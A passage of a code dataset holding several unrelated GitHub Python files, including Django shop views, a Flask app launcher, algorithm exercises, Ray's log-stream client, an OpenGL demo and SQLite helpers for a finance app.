'indexx.html')\r\n\r\ndef acerca(request):\r\n    return render(request, 'acerca.html')\r\n\r\ndef feed(request):\r\n    context = {\r\n        #'profile' \"\"\r\n        'posts': Post.objects.all()\r\n    }\r\n    return render(request, 'feed.html', context)\r\n\r\n@login_required\r\ndef post(request):\r\n\tcurrent_user = get_object_or_404(User, pk=request.user.pk)\r\n\tif request.method == 'POST':\r\n\t\tform = PostForm(request.POST)\r\n\t\tif form.is_valid():\r\n\t\t\tpost = form.save(commit=False)\r\n\t\t\tpost.user = current_user\r\n\t\t\tpost.save()\r\n\t\t\tmessages.success(request, 'Post enviado')\r\n\t\t\treturn redirect('feed')\r\n\telse:\r\n\t\tform = PostForm()\r\n\treturn render(request, 'post.html', {'form' : form })\r\n\r\ndef register(request):\r\n    if request.method == 'POST':\r\n        form = CreateUserForm(request.POST)\r\n        if form.is_valid():\r\n            form.save()\r\n            user = form.cleaned_data.get('username')\r\n            Cart.objects.create(user = User.objects.get(username = user), total = 0.00)\r\n            messages.success(request,'se ha creado la cuenta de' + user)\r\n\r\n            return redirect('login')\r\n    else:\r\n        form = CreateUserForm()\r\n\r\n    context = {'form': form}\r\n    return render(request, 'RegistrarUser.html', context)\r\n\r\ndef loginpage(request):\r\n    if request.method == 'POST':\r\n        username = request.POST.get('username')\r\n        password = request.POST.get('password')\r\n\r\n        users = authenticate(request, username = username, password = password)\r\n\r\n        if users is not None:\r\n            login(request, users)\r\n            return redirect('index')\r\n        else:\r\n            
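            # authentication failed: flash an error and fall through to re-render the login page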
messages.info(request, 'contrasena incorrecta')\r\n\r\n context = {}\r\n return render(request, 'login.html', context)\r\n\r\ndef logoutpage(request):\r\n logout(request)\r\n return redirect(\"index\")\r\n\r\ndef products(request):\r\n if request.user.is_authenticated:\r\n context = {\r\n 'item_cats': Item_Category.objects.all(),\r\n 'items': Item.objects.all(),\r\n 'toppings': Topping.objects.all()\r\n }\r\n return render(request, 'productos.html', context)\r\n else:\r\n return redirect('login')\r\n\r\ndef addItem_view(request):\r\n \r\n if request.method == 'POST':\r\n try:\r\n item_id = request.POST['item-id']\r\n except:\r\n item_id = None\r\n try:\r\n max_topping = request.POST['max-topping']\r\n except:\r\n max_topping = None\r\n try:\r\n size = request.POST['size-select']\r\n except:\r\n size = None\r\n \r\n toppings = []\r\n if max_topping:\r\n for i in max_topping:\r\n try:\r\n top = request.POST[f'select-{i}']\r\n toppings.append(Topping.objects.get(pk=top))\r\n except:\r\n pass\r\n\r\n item = Item.objects.get(pk=item_id)\r\n if size == '1 logo':\r\n price = item.price_small\r\n elif size == '2 logo':\r\n price = item.price_large\r\n \r\n print(request.user)\r\n cart = Cart.objects.get(user=request.user)\r\n cart_item = Cart_Item(cart=cart, item_detail=item, size=size, price=price)\r\n cart_item.save()\r\n if len(toppings) > 0:\r\n for topping in toppings:\r\n cart_item.topping.add(topping)\r\n cart_item.save()\r\n cart.total += cart_item.price\r\n cart.save()\r\n messages.success(request, 'pedido registrado')\r\n return HttpResponseRedirect(reverse('products'))\r\n\r\ndef removeItem_view(request, cart_item_id):\r\n cart_item = Cart_Item.objects.get(pk=cart_item_id)\r\n cart = Cart.objects.get(user=request.user)\r\n cart.total -= cart_item.price\r\n cart_item.delete()\r\n cart.save()\r\n messages.success(request, 'removido!')\r\n return HttpResponseRedirect(reverse('cart'))\r\n\r\ndef emptyCart_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart.total = 0\r\n cart.save()\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n if cart_items:\r\n for cart_item in cart_items:\r\n cart_item.delete()\r\n messages.success(request, 'Limpió su carrito')\r\n return HttpResponseRedirect(reverse('cart'))\r\n\r\ndef cart_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n if not cart_items:\r\n return render(request, 'cart.html', {'empty': True})\r\n return render(request, 'cart.html', {'empty': False, 'cart_items': cart_items, 'cart':cart})\r\n\r\ndef order_view(request):\r\n cart = Cart.objects.get(user=request.user)\r\n cart_items = Cart_Item.objects.filter(cart=cart)\r\n\r\n #create a new empty order\r\n order = Order(user=request.user, total=cart.total)\r\n order.save()\r\n\r\n for cart_item in cart_items:\r\n order_item = Order_Item(order=order, item_detail=cart_item.item_detail, size=cart_item.size, price=cart_item.price)\r\n order_item.save()\r\n order_item.topping.set(cart_item.topping.all())\r\n order_item.save()\r\n messages.success(request, 'colocado con éxito')\r\n emptyCart_view(request)\r\n return HttpResponseRedirect(reverse('products'))\r\n\r\ndef orders_view(request):\r\n orders = Order.objects.filter(user=request.user)\r\n if not orders:\r\n return render(request, 'orders.html', {'empty': True})\r\n dic = dict()\r\n for order in orders:\r\n order_items = Order_Item.objects.filter(order=order)\r\n dic.update({order: order_items})\r\n\r\n return render(request, 'orders.html', {'empty': 
False, 'dic': dic})\r\n\r\ndef viewOrders_view(request):\r\n if request.method == 'POST':\r\n pass\r\n else:\r\n if request.user.is_staff:\r\n orders = Order.objects.exclude(status='Completada')\r\n if not orders:\r\n return render(request, 'vieworders.html', {'empty': True})\r\n dic = dict()\r\n for order in orders:\r\n order_items = Order_Item.objects.filter(order=order)\r\n dic.update({order: order_items})\r\n\r\n return render(request, 'vieworders.html', {'empty': False, 'dic': dic})\r\n\r\ndef markComplete_view(request, order_item_id):\r\n order = Order.objects.get(pk=order_item_id)\r\n order.status = 'Completada'\r\n order.save()\r\n messages.add_message(request, messages.SUCCESS, f'Orden marcada #{order.pk} como completada')\r\n return HttpResponseRedirect(reverse('vieworders'))\r\n\r\n\r\n\r\n","repo_name":"snaybanban/comercial","sub_path":"APPS/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24224676190","text":"# Monolithic launch\nimport subprocess\nfrom config import flask_bin\nimport os\nimport stat\nimport socket, errno\n\n\ndef initialize_flask_buddy():\n global env_command_dir\n current_directory = os.getcwd()\n env_command_dir = os.path.join(current_directory, r'buds')\n if not os.path.exists(env_command_dir):\n os.makedirs(env_command_dir)\n\n\ndef check_flask_port():\n global port\n for port in range(5000, 6000):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.bind((\"127.0.0.1\", port))\n print(\"Connected : {}\".format(port))\n break\n except socket.error as e:\n if e.errno == errno.EADDRINUSE:\n print(\"{}\".format(port), \" in use.\")\n else:\n # something else raised the socket.error exception\n print(e)\n\n s.close()\n\n\ndef get_project():\n global user_input_name\n while True:\n user_input_name = input(\"Key: \")\n if user_input_name in flask_bin:\n print(flask_bin[user_input_name])\n check_flask_port()\n venv_instance()\n if user_input_name not in flask_bin:\n print (\"Flask app not found.\")\n continue\n break\n\n\ndef venv_instance():\n print(\"Generating command file...\")\n env_file = user_input_name + '.command'\n buddy_loc = os.getcwd()\n env_file_loc = buddy_loc + \"/buds/\"\n try:\n env = open(env_file_loc + env_file, 'w+')\n except IOError:\n env = open(env_file_loc + env_file, 'w+')\n if os.path.exists(env_file_loc + user_input_name + '.command'):\n env.write(\"cd \" '{}\\n'.format(flask_bin[user_input_name]) + \"\\nsource venv/bin/activate\\n\" \"\\nflask run --port \" '{}\\n'.format(port))\n st = os.stat(env_file_loc + user_input_name + '.command')\n os.chmod(env_file_loc + user_input_name + '.command', st.st_mode | stat.S_IEXEC)\n print(\"Written with perms.\")\n else:\n print(\"Error writing env file.\")\n try:\n print(\"Opening term window...\")\n subprocess.call(['open', env.name])\n print(\"Term Window Opened.\")\n except Exception as E:\n print(\"FAIL: {0}\".format(E))\n\n\nif __name__ == '__main__':\n get_project()\n","repo_name":"jakedent/fluddy","sub_path":"tests/test003.py","file_name":"test003.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"86"} +{"seq_id":"29834617450","text":"# Dynamic Array Theory\n\n\"\"\"A dynamic array is an array with a big improvement: automatic resizing.\n One limitation of arrays is that they're fixed size,\n meaning you need to specify the number of elements\n your 
array will hold ahead of time.\n    A dynamic array expands as you add more elements\"\"\"\n\n# NO need to specify array size beforehand\n# That extra space eventually runs out if you keep adding elements\n\nimport sys\n# set n\nn = 10\n# set empty list\ndata = []\nfor i in range(n):\n\n# number of elements\n    a = len(data)\n# actual size in bytes\n    b = sys.getsizeof(data)\n    print(f' *** Length: {a} & Size in bytes: {b} ***')\n# increase length by one\n    data.append(n)\n\n\n# Theoretical Implementation\n# 1. Given array A\n# 2. Create array B with higher capacity (common rule is to double capacity of existing array)\n# 3. Store elements of A in B (set references)\n# 4. Reassign reference A to new array (B became A now)\n\n\"\"\" \"\"\"\n\n","repo_name":"ane4katv/STUDY","sub_path":"Basic Algorithms/Arrays/2. Dynamic Array Theory.py","file_name":"2. Dynamic Array Theory.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6595099455","text":"# Find the lowest common ancestor in an unordered binary tree given two values in the tree.\n\n# Lowest common ancestor : the lowest common ancestor (LCA) of two nodes v and w in a tree or directed acyclic graph (DAG) is the lowest \n# (i.e. deepest) node that has both v and w as descendants. \n# Example :\n\n\n#         _______3______\n#        /              \\\n#     ___5__          ___1__\n#    /      \\        /      \\\n#   6      _2_      0        8\n#         /   \\\n#         7    4\n# For the above tree, the LCA of nodes 5 and 1 is 3.\n\n# LCA = Lowest common ancestor \n\n# Please note that LCA for nodes 5 and 4 is 5.\n\n# You are given 2 values. Find the lowest common ancestor of the two nodes represented by val1 and val2\n# No guarantee that val1 and val2 exist in the tree. If one value doesn’t exist in the tree then return -1.\n# There are no duplicate values.\n# You can use extra memory, helper functions, and can modify the node struct but, you can’t add a parent pointer.\n\n##########################################################################################################################################\n\n# Definition for a binary tree node\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\ndef find_num(A, B, C, l_b, l_c):\n    if not l_b or B != l_b[-1]:\n        l_b.append(A)\n    if not l_c or C != l_c[-1]:\n        l_c.append(A)\n    \n    if A.left:\n        l_b, l_c = find_num(A.left, B, C, l_b, l_c)\n        if B != l_b[-1]:\n            l_b.pop()\n        if C != l_c[-1]:\n            l_c.pop()\n    if A.right:\n        l_b, l_c = find_num(A.right, B, C, l_b, l_c)\n        if B != l_b[-1]:\n            l_b.pop()\n        if C != l_c[-1]:\n            l_c.pop()\n    \n    return l_b, l_c\n    \n    \n\nclass Solution:\n    # @param A : root node of tree\n    # @param B : integer\n    # @param C : integer\n    # @return an integer\n    def lca(self, A, B, C):\n        if A is None:\n            return -1\n        \n        l_b, l_c = find_num(A, B, C, [], [])\n        if len(l_b) == 1 and l_b[0] != B:\n            return -1\n        if len(l_c) == 1 and l_c[0] != C:\n            return -1\n        \n        while len(l_b) != len(l_c):\n            if len(l_b) > len(l_c):\n                l_b.pop()\n            else:\n                l_c.pop()\n        \n        while l_b:\n            if l_b[-1] == l_c[-1]:\n                return l_b[-1]\n            \n            l_b.pop()\n            l_c.pop()\n    \n##########################################################################################################################################\n","repo_name":"EladAssia/InterviewBit","sub_path":"Tree Data Structure/Least_Common_Ancestor.py","file_name":"Least_Common_Ancestor.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} 
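# A minimal sketch of the four-step resize described in the "Dynamic Array Theory"
# record above; the DynamicArray class below and all of its names are hypothetical,
# illustrative only, and not taken from any record:
class DynamicArray:
    """Grow-on-demand array: double the backing store when it fills up."""

    def __init__(self):
        self._capacity = 1                     # current size of the backing store
        self._count = 0                        # number of elements actually stored
        self._store = [None] * self._capacity

    def append(self, value):
        if self._count == self._capacity:
            self._resize(2 * self._capacity)   # common rule: double the capacity
        self._store[self._count] = value
        self._count += 1

    def _resize(self, new_capacity):
        new_store = [None] * new_capacity      # step 2: create bigger array B
        for i in range(self._count):           # step 3: copy references from A to B
            new_store[i] = self._store[i]
        self._store = new_store                # step 4: B becomes the new A
        self._capacity = new_capacity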
+{"seq_id":"23568555604","text":"\"\"\"This file implements a threaded stream controller to return logs back from\nthe ray clientserver.\n\"\"\"\nimport sys\nimport logging\nimport queue\nimport threading\nimport time\nimport grpc\n\nfrom typing import TYPE_CHECKING\n\nimport ray.core.generated.ray_client_pb2 as ray_client_pb2\nimport ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc\n\nfrom ray.util.debug import log_once\n\nif TYPE_CHECKING:\n from ray.util.client.worker import Worker\n\nlogger = logging.getLogger(__name__)\n# TODO(barakmich): Running a logger in a logger causes loopback.\n# The client logger need its own root -- possibly this one.\n# For the moment, let's just not propogate beyond this point.\nlogger.propagate = False\n\n\nclass LogstreamClient:\n def __init__(self, client_worker: \"Worker\", metadata: list):\n \"\"\"Initializes a thread-safe log stream over a Ray Client gRPC channel.\n\n Args:\n client_worker: The Ray Client worker that manages this client\n metadata: metadata to pass to gRPC requests\n \"\"\"\n self.client_worker = client_worker\n self._metadata = metadata\n self.request_queue = queue.Queue()\n self.log_thread = self._start_logthread()\n self.log_thread.start()\n self.last_req = None\n\n def _start_logthread(self) -> threading.Thread:\n return threading.Thread(target=self._log_main, args=(), daemon=True)\n\n def _log_main(self) -> None:\n reconnecting = False\n while not self.client_worker._in_shutdown:\n if reconnecting:\n # Refresh queue and retry last request\n self.request_queue = queue.Queue()\n if self.last_req:\n self.request_queue.put(self.last_req)\n stub = ray_client_pb2_grpc.RayletLogStreamerStub(self.client_worker.channel)\n try:\n log_stream = stub.Logstream(\n iter(self.request_queue.get, None), metadata=self._metadata\n )\n except ValueError:\n # Trying to use the stub on a cancelled channel will raise\n # ValueError. This should only happen when the data client\n # is attempting to reset the connection -- sleep and try\n # again.\n time.sleep(0.5)\n continue\n try:\n for record in log_stream:\n if record.level < 0:\n self.stdstream(level=record.level, msg=record.msg)\n self.log(level=record.level, msg=record.msg)\n return\n except grpc.RpcError as e:\n reconnecting = self._process_rpc_error(e)\n if not reconnecting:\n return\n\n def _process_rpc_error(self, e: grpc.RpcError) -> bool:\n \"\"\"\n Processes RPC errors that occur while reading from data stream.\n Returns True if the error can be recovered from, False otherwise.\n \"\"\"\n if self.client_worker._can_reconnect(e):\n if log_once(\"lost_reconnect_logs\"):\n logger.warning(\n \"Log channel is reconnecting. 
Logs produced while \"\n                    \"the connection was down can be found on the head \"\n                    \"node of the cluster in \"\n                    \"`ray_client_server_[port].out`\"\n                )\n            logger.debug(\"Log channel dropped, retrying.\")\n            time.sleep(0.5)\n            return True\n        logger.debug(\"Shutting down log channel.\")\n        if not self.client_worker._in_shutdown:\n            logger.exception(\"Unexpected exception:\")\n        return False\n\n    def log(self, level: int, msg: str):\n        \"\"\"Log the message from the log stream.\n        By default, calls logger.log but this can be overridden.\n\n        Args:\n            level: The loglevel of the received log message\n            msg: The content of the message\n        \"\"\"\n        logger.log(level=level, msg=msg)\n\n    def stdstream(self, level: int, msg: str):\n        \"\"\"Log the stdout/stderr entry from the log stream.\n        By default, calls print but this can be overridden.\n\n        Args:\n            level: The loglevel of the received log message\n            msg: The content of the message\n        \"\"\"\n        print_file = sys.stderr if level == -2 else sys.stdout\n        print(msg, file=print_file, end=\"\")\n\n    def set_logstream_level(self, level: int):\n        logger.setLevel(level)\n        req = ray_client_pb2.LogSettingsRequest()\n        req.enabled = True\n        req.loglevel = level\n        self.request_queue.put(req)\n        self.last_req = req\n\n    def close(self) -> None:\n        self.request_queue.put(None)\n        if self.log_thread is not None:\n            self.log_thread.join()\n\n    def disable_logs(self) -> None:\n        req = ray_client_pb2.LogSettingsRequest()\n        req.enabled = False\n        self.request_queue.put(req)\n        self.last_req = req\n","repo_name":"ray-project/ray","sub_path":"python/ray/util/client/logsclient.py","file_name":"logsclient.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"74148999003","text":"class lang_de:\n    devices = \"Geräte\"\n    gamemodes = \"Spielmodi\"\n    link = \"LoeweTag Link\"\n    settings = \"Einstellungen\"\n    quit = \"Beenden?\"\n    quitmessage = \"Möchtest du das Programm wirklich beenden?\"\n    software_name = \"LoeweTag PC Software\"\n    node_id = \"Node ID\"\n    device_type = \"Gerät Typ\"\n    firmware = \"Firmware\"\n    refresh = \"Aktualisieren\"\n    no_devices = \"Keine Geräte\"\n    repeater = \"Verstärker\"\n    gun = \"Pistole\"\n    unknown = \"Unbekannt\"\n    language = \"Sprache\"\n    connect = \"Verbinden\"\n    disconnect = \"Trennen\"\n    control = \"Steuerung\"\n    find = \"Suchen\"\n    settings_info = \"Das Programm muss neu gestartet werden, damit die Einstellungen angewendet werden.\"\n    developer = \"Entwickler\"\n    variables = \"Variablen\"\n    colors = \"Farben\"\n    color = \"Farbe\"\n    gamestate = \"Spielstatus\"\n    red = \"Rot\"\n    green = \"Grün\"\n    blue = \"Blau\"\n    broadcast = \"Broadcast\"\n    send_to_address = \"Senden zu Adresse:\"\n    send = \"Senden\"\n    design = \"Design\"","repo_name":"Loewe111/LoeweTag-Client-Deprecated","sub_path":"locales/language_de.py","file_name":"language_de.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72983109723","text":"\"\"\"\"\nTD\nLinear algebra\nthe vector\ncombination and concatenation\n\"\"\"\nimport numpy as np\n\na = np.array([1,2,3,4])\n\nb = np.array([-1,3,4,6])\n\nz = np.concatenate([a,b])\n\nx_a = np.array([1,0,0,0,0])\nx_e = np.array([0,1,0,0,0])\nx_i = np.array([0,0,1,0,0])\nx_u = np.array([0,0,0,1,0])\nx_o = np.array([0,0,0,0,1])\nvoyelle = np.eye(5)\n\n\"\"\"\"or \nnp.eye()\nto create a 2D diagonal array\n\"\"\"\noui_com = x_o+ x_u+ x_i\n#print(oui_com) [0 0 
1 1 1]\noui = np.concatenate([x_o,x_u,x_i])\n#print(oui) [0 0 0 0 1 0 0 0 1 0 0 0 1 0 0]\n\n\"\"\"the difference: the first is a linear combination of the three vectors, so the result keeps the same size \nwhile concatenation creates a vector with a larger size\"\"\"\ntext = open(\"text.txt\", \"r\")\nx = \"la souris mange le fromage et le trouve bon\"\nl_w = x.split()\ndef text_dict(text):\n    set_word = set(text)\n    word_list = list(set_word)\n    word_idx = {tokens : idx for (idx, tokens) in enumerate(word_list)}\n    return word_idx\n\ndicto = text_dict(l_w)\n\nprint(text_dict(l_w))\ndef text_vect(dicto, l_w):\n    t = np.zeros(len(l_w))\n    x = np.eye(len(l_w))\n    for tok in l_w:\n        idx = dicto[tok]\n        t = t+x[idx]\n    return t\n\nprint(text_vect(dicto,l_w))\n\n\n\n\n\n\n\n\n","repo_name":"CoCorooxin/linearAlgebra","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30904804360","text":"import pygame as pg\nimport numpy as np\n\nfrom OpenGL.GL import *\nimport glm\n\nfrom renderer import Renderer\nfrom shader import ShaderProgram\nfrom shapes import *\nfrom utils import *\n\npg.init()\n\nxsize = 1200\nysize = 900\n\npg.display.set_mode((xsize, ysize), pg.OPENGL|pg.DOUBLEBUF)\npg.display.set_caption(\"Lab1\")\npg.display.gl_set_attribute(pg.GL_MULTISAMPLESAMPLES, 16)\n\nglClearColor(0, 0, 0, 1)\nglEnable(GL_DEPTH_TEST)\nglDepthFunc(GL_LESS)\nglPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\nglEnable(GL_MULTISAMPLE)\n\nshader = ShaderProgram(\"shaders/default.vert\", \"shaders/default.frag\")\nshader.install()\n\nmodel_matrix = glm.mat4(1)\nview_matrix = glm.lookAt((0, 2, 3), (0, 0, 0), (0, 1, 0))\nproj_matrix = glm.perspective(glm.radians(45), xsize / ysize, 0.01, 100)\n\nset_matrix(shader, \"model\", model_matrix)\nset_matrix(shader, \"view\", view_matrix)\nset_matrix(shader, \"proj\", proj_matrix)\n\nclock = pg.time.Clock()\n\ncylinder = Renderer(Cylinder())\ncone = Renderer(Cone())\n\nrunning = True\nanimation = False\nbutton_down = False\n\ni = 0\nj = 0\n\nwhile running:\n    #refresh screen\n    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n    for event in pg.event.get():\n        if event.type == pg.QUIT:\n            running = False\n\n        if event.type == pg.KEYDOWN:\n            if pg.key.get_pressed()[pg.K_a]:\n                animation = True\n            if pg.key.get_pressed()[pg.K_b]:\n                animation = False\n\n        if event.type == pg.MOUSEMOTION:\n            if button_down:\n                model_matrix *= glm.rotate(glm.radians(event.rel[1] / 10), (1, 0, 0))\n                model_matrix *= glm.rotate(glm.radians(event.rel[0] / 10), (0, 1, 0))\n                set_matrix(shader, \"model\", model_matrix)\n\n    button_down = pg.mouse.get_pressed()[0]\n\n    if animation:\n        i = min(100, i + 0.5)\n        j = min(90, i + 0.5)\n    else:\n        i = max(0, i - 0.5)\n        j = max(0, j - 0.5)\n\n    glLineWidth(2)\n    set_vector(shader, \"color\", glm.vec4(1, 0, 0, 1))\n    cylinder_matrix = glm.translate((0, 1, 0))\n    cyl_rot_matrix = glm.rotate(glm.radians(j), (1, 0, 0))\n    set_matrix(shader, \"model\", model_matrix * cylinder_matrix * cyl_rot_matrix)\n    cylinder.display()\n    set_matrix(shader, \"model\", model_matrix)\n\n    set_vector(shader, \"color\", glm.vec4(0, 1, 0, 1))\n    cone_matrix = glm.rotate(glm.radians(i), (0, 0, 1))\n    set_matrix(shader, \"model\", model_matrix * cone_matrix)\n    cone.display()\n    set_matrix(shader, \"model\", model_matrix)\n\n    # glLineWidth(2)\n    # set_vector(shader, \"color\", glm.vec4(0, 1, 0, 1))\n    # 
cube_matrix = glm.translate((i, 0, 0))\n    # set_matrix(shader, \"model\", model_matrix * cube_matrix)\n    # cube.display()\n    # set_matrix(shader, \"model\", model_matrix)\n\n    # sphere_matrix = glm.translate((0.5, 0, 0))\n    # set_matrix(shader, \"model\", model_matrix * sphere_matrix)\n    # set_vector(shader, \"color\", glm.vec4(1, 0, 0, 1))\n    # sphere.display()\n    # set_matrix(shader, \"model\", model_matrix)\n\n    # set_vector(shader, \"color\", glm.vec4(0, 0, 1, 1))\n    # cube2_matrix = glm.translate((-0.5, 0, 0))\n    # set_matrix(shader, \"model\", model_matrix * cube2_matrix)\n    # cube2.display()\n    # set_matrix(shader, \"model\", model_matrix)\n\n    pg.display.flip()\n    clock.tick(60)\n\npg.quit()","repo_name":"MikhailFerapontow/graphic","sub_path":"lab1/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12692350407","text":"from flask import Flask,render_template,url_for,request\nimport pandas as pd \nimport pickle\nimport re\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n#from sklearn.externals import joblib\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n    print('hello')\n    sms_classify('naura')\n\n\ndef sms_classify(message):\n    '''\n    Takes in as input a new sms (w1, w2, ..., wn),\n    calculates P(Spam|w1, w2, ..., wn) and P(Ham|w1, w2, ..., wn),\n    compares them and outcomes whether the message is spam or not.\n    '''\n    \n    # Replace addresses (http, email), numbers (plain, phone), money symbols\n    # (note: these are regex patterns, so re.sub is needed; str.replace would\n    # only match them literally)\n    message = re.sub(r'\\b[\\w\\-.]+?@\\w+?\\.\\w{2,4}\\b', ' ', message)\n    message = re.sub(r'(http[s]?\\S+)|(\\w+\\.[A-Za-z]{2,4}\\S*)', ' ', message)\n    message = re.sub(r'£|\\$', ' ', message) \n    message = re.sub(r'\\b(\\+\\d{1,2}\\s)?\\d?[\\-(.]?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}\\b', ' ', message) \n    message = re.sub(r'\\d+(\\.\\d+)?', ' ', message)\n\n    # Remove punctuation, collapse all whitespace (spaces, line breaks, tabs) into a single space & eliminate any leading/trailing whitespace.\n    message = re.sub(r'[^\\w\\d\\s]', ' ', message)\n    message = re.sub(r'\\s+', ' ', message)\n    message = re.sub(r'^\\s+|\\s+?$', '', message)\n    message = re.sub(r'_[\\w\\d\\s]', ' ', message)\n\n    # Lowercase the entire corpus\n    message = message.lower()\n\n    # Remove stop words \n    from nltk.corpus import stopwords\n    stop_words = set(stopwords.words('english'))\n    \n    terms = []\n    for term in message.split():\n        if term not in set(stop_words):\n            terms.append(term)\n    message = ' '.join(terms)\n\n    # Lemmatization\n    import nltk\n    lemmatizer = nltk.stem.WordNetLemmatizer()\n    \n    message = ' '.join(lemmatizer.lemmatize(term, pos='v') for term in message.split()) \n    \n    # Stemming\n    ss = nltk.SnowballStemmer(\"english\")\n    \n    message = ' '.join(ss.stem(term) for term in message.split()) \n    \n    # Tokenization\n    from nltk.tokenize import word_tokenize\n    \n    message = message.split()\n    \n\n    \n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n    \n","repo_name":"bartlomiej-wlodarski/spam_detector","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70668077085","text":"def fact(num): # Returns the factorial of num.\n    if num > 1:\n        factorial = num*fact(num-1)\n    
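    # base case: both 0! and 1! equal 1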
elif num == 1 or num == 0:\n        return 1\n    return factorial\n\ndef FactSumDigits(n):\n    mylist = []\n    y = str(n)\n    for i in y:\n        mylist.append(i)\n    sumup = 0\n    for digit in mylist:\n        sumup += fact(int(digit))\n    return sumup\n\n\nx = FactSumDigits(21)\nprint(x)\n","repo_name":"Algomaster0628/FactSumDigits","sub_path":"FactDigitSum.py","file_name":"FactDigitSum.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37309533012","text":"from database import get_db, close_db\n\n\ndef getItemsByDay(user_id, day):\n    \"\"\"\n    Returns items for a given day and user\n    \"\"\"\n\n    db = get_db()\n    query = \"\"\"\n    SELECT summary.id, item.item, item.price, category.category\n    FROM item \n    INNER JOIN summary\n    ON item.id = summary.item_id\n    INNER JOIN category\n    ON summary.category_id = category.id \n    INNER JOIN user \n    ON summary.user_id = user.id \n    WHERE summary.date = ? \n    AND user.id = ?\n    \"\"\"\n    response = db.execute(query, (str(day), str(user_id), )).fetchall()\n    return response\n\n\ndef populateCategories(user_id):\n    \"\"\"\n    Populates categories from database by user id\n    \"\"\"\n\n    db = get_db()\n    query = \"\"\"\n    SELECT category.category\n    FROM category\n    INNER JOIN user\n    ON user.id = category.user_id\n    WHERE user.id = ?\n    \"\"\"\n    categories = db.execute(query, (str(user_id),)).fetchall()\n    select = []\n    for category in categories:\n        select.append(category[\"category\"])\n    return select\n\n\ndef checkIfItemExists(item, price, description, user_id):\n    \"\"\"\n    Checks if the item exists before adding, to reduce redundancy. DEPRECATED\n    \"\"\"\n\n    db = get_db()\n    query = \"\"\"\n    SELECT item.item \n    FROM item\n    INNER JOIN summary\n    ON item.id = summary.item_id\n    INNER JOIN user\n    ON user.id = summary.user_id\n    WHERE item.item = ?\n    AND item.price = ?\n    AND item.description = ?\n    AND user.id = ?\n    \"\"\"\n    response = db.execute(query, (str(item), str(\n        price), str(description), str(user_id), )).fetchall()\n    if response:\n        return True\n    else:\n        return False\n\n\ndef addItem(item, price, description, user_id, date, category):\n    \"\"\"\n    Adds an item into the item table\n    \"\"\"\n\n    # if not checkIfItemExists(item, price, description, user_id):\n    db = get_db()\n    query = \"\"\"\n    INSERT INTO item (item, price, description) VALUES (?, ?, ?);\n    \"\"\"\n    db.execute(query, (str(item), str(price), str(description)))\n    db.commit()\n    addToSummary(user_id, category, date)\n\n\ndef addToSummary(user_id, category, date):\n    \"\"\"\n    Checks if it is possible to add to summary and if it is, adds it\n    \"\"\"\n\n    db = get_db()\n    query = \"\"\"\n    SELECT id FROM item ORDER BY id DESC LIMIT 1; \n    \"\"\"\n    item_id = db.execute(query).fetchone()[\"id\"]\n\n    query = \"\"\"\n    SELECT id FROM category WHERE category = ? 
AND user_id = ?\n    \"\"\"\n\n    response = db.execute(query, (str(category), str(user_id))).fetchone()\n    category_id = response[\"id\"]\n\n    query = \"\"\"\n    INSERT INTO summary (user_id, item_id, category_id, date) VALUES (?, ?, ?, ?);\n    \"\"\"\n    db.execute(query, (str(user_id), str(item_id),\n               str(category_id), str(date),))\n    db.commit()\n\n\ndef deleteItemFromDB(id):\n    \"\"\" \n    Deletes item by its id\n    \"\"\"\n\n    db = get_db()\n    query = \"\"\"\n    DELETE FROM summary \n    WHERE id = ?\n    \"\"\"\n    db.execute(query, (str(id), ))\n    db.commit()\n","repo_name":"BenTheShork/FinanceMe","sub_path":"dayDetails.py","file_name":"dayDetails.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2322561749","text":"\"\"\"\nThis script downloads the Spotify 1 million tracks dataset from\nKaggle (https://www.kaggle.com/datasets/amitanshjoshi/spotify-1million-tracks)\nand unzips it to the subfolder 'data' on the top level.\nThe script leverages the Kaggle SDK for authenticating with the Kaggle API and downloading the dataset.\nMake sure that the 'kaggle.json' file with the Kaggle API credentials is properly set up in the system.\nYou can follow the instructions at https://www.kaggle.com/docs/api.\n\nThe main function 